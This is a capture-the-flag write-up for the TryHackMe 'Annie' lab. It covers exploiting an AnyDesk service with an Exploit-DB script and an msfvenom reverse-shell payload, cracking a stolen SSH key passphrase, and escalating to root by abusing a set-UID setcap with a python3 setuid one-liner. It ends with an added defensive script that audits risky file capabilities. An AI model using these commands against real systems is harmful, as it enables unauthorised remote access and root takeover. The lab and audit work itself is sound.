TryHackMe

Writeups for the rooms available in TryHackMe


https://tryhackme.com/room/annie


Difficulty : Medium

Initial Recon:

Started with a quick rustscan and found 3 open ports:

sudo rustscan -a 10.10.30.155 -- -sC -sV -T4 -vv -oN Annie_nmap
Open 10.10.30.155:22
Open 10.10.30.155:7070
Open 10.10.30.155:33017

In the scan results I observed that an AnyDesk client is running on port 7070. Looking at this, I got a hint that this might be the point of initial access.

Exploitation:

I quickly searched Google for “AnyDesk 7070 exploit” & got the results:

Since I didn’t have any version info, I went with the first search result, provided by Exploit-DB for version 5.5.2, ref: https://www.exploit-db.com/exploits/49613

This gave us the Python exploit for remote code execution:

As per the exploit, we have to create our own shellcode with msfvenom, so I created my own:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode


After much trial & error, many LPORT changes & many room resets, I finally received my connection on port 7070, on which AnyDesk is running.


I received the connection as user “Annie” (pwn3d! 🙂)

Now it’s time to upgrade & stabilize the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg (and press enter)


User.txt:

And I got the user flag in Annie’s home directory itself.

In Annie’s folder I found a directory named “.ssh” where annie’s private key is saved as ‘id_rsa’, so I copied it to my machine & tried to SSH, but it failed as it asks for a passphrase.


So I quickly used the John the Ripper helper “ssh2john” to convert the id_rsa file into John the Ripper format & tried to crack it. Within a few seconds I was able to crack it as well.

Priv Esc:

I started with manual enumeration, like checking the sudo version, cron jobs, sudo permissions etc. But I found something unusual in the SUID list: a binary called “/sbin/setcap”.

find / -perm -4000 -type f 2>/dev/null


I quickly searched for “setcap priv esc” & landed on this page: https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/

As per the blog, if we have permission to set capabilities then we can change the capabilities of python3 (as an example) & get root privileges.


So, for the priv esc I followed the blog & copied the python3 binary to the /tmp folder:

cp /usr/bin/python3 /tmp

Then changed the capabilities of that python3 file:

setcap cap_setuid+ep /tmp/python3

And ran that python3 to set my UID to 0 & execute a bash shell:

./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

This gave me root privileges (pwn3d! 🙂)
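From the defender’s side, the root cause of this escalation is a set-UID setcap binary plus a capability (cap_setuid) that lets an unprivileged process become root. The audit script below is an added example, not part of the original writeup or the room: it parses getcap output (a constructed sample is embedded so it runs offline) and flags binaries carrying capabilities that are enough to gain root, and checks whether setcap itself is set-UID.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit file capabilities the
# way a defender would after reading this escalation path.

# Capabilities that by themselves allow a process to become root or read
# anything; cap_setuid is the one abused in the writeup.
DANGEROUS='cap_setuid|cap_setgid|cap_sys_admin|cap_dac_override|cap_dac_read_search|cap_sys_ptrace|cap_sys_module'

# Reads `getcap -r` output on stdin and prints "<path> <capset>" for every
# binary whose capability set matches DANGEROUS. Handles both the older
# "path = capset" and the newer "path capset" output formats of getcap.
audit_caps() {
    sed 's/ = / /' | awk -v pat="$DANGEROUS" '
        NF >= 2 && $2 ~ pat { print $1, $2 }'
}

# Number of flagged binaries on stdin; 0 means nothing risky was found.
count_flagged() {
    audit_caps | wc -l | tr -d ' '
}

# Returns true (0) when the given file has the set-UID bit, which for
# /sbin/setcap means any local user could hand out capabilities.
check_setcap_suid() {
    [ -u "$1" ]
}

# Constructed sample in getcap -r style: ping and mtr-packet are the usual
# benign cap_net_raw cases, /tmp/python3 mirrors the writeup's escalation.
SAMPLE='/usr/bin/ping = cap_net_raw+ep
/tmp/python3 = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep'

if [ "${1:-}" = "--demo" ]; then
    # Runs the audit over the embedded sample; flags only /tmp/python3.
    printf '%s\n' "$SAMPLE" | audit_caps
elif [ "${1:-}" = "--scan" ]; then
    # Live check of the host (needs getcap from libcap; run as root for full coverage).
    getcap -r / 2>/dev/null | audit_caps
    check_setcap_suid /sbin/setcap && echo "WARNING: /sbin/setcap is set-UID"
fi
```

Run with `--demo` to see the sample result, or `--scan` on a host to list risky capability grants and warn if setcap is set-UID.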


Root.txt:

After successful execution I got the root flag in the root folder.
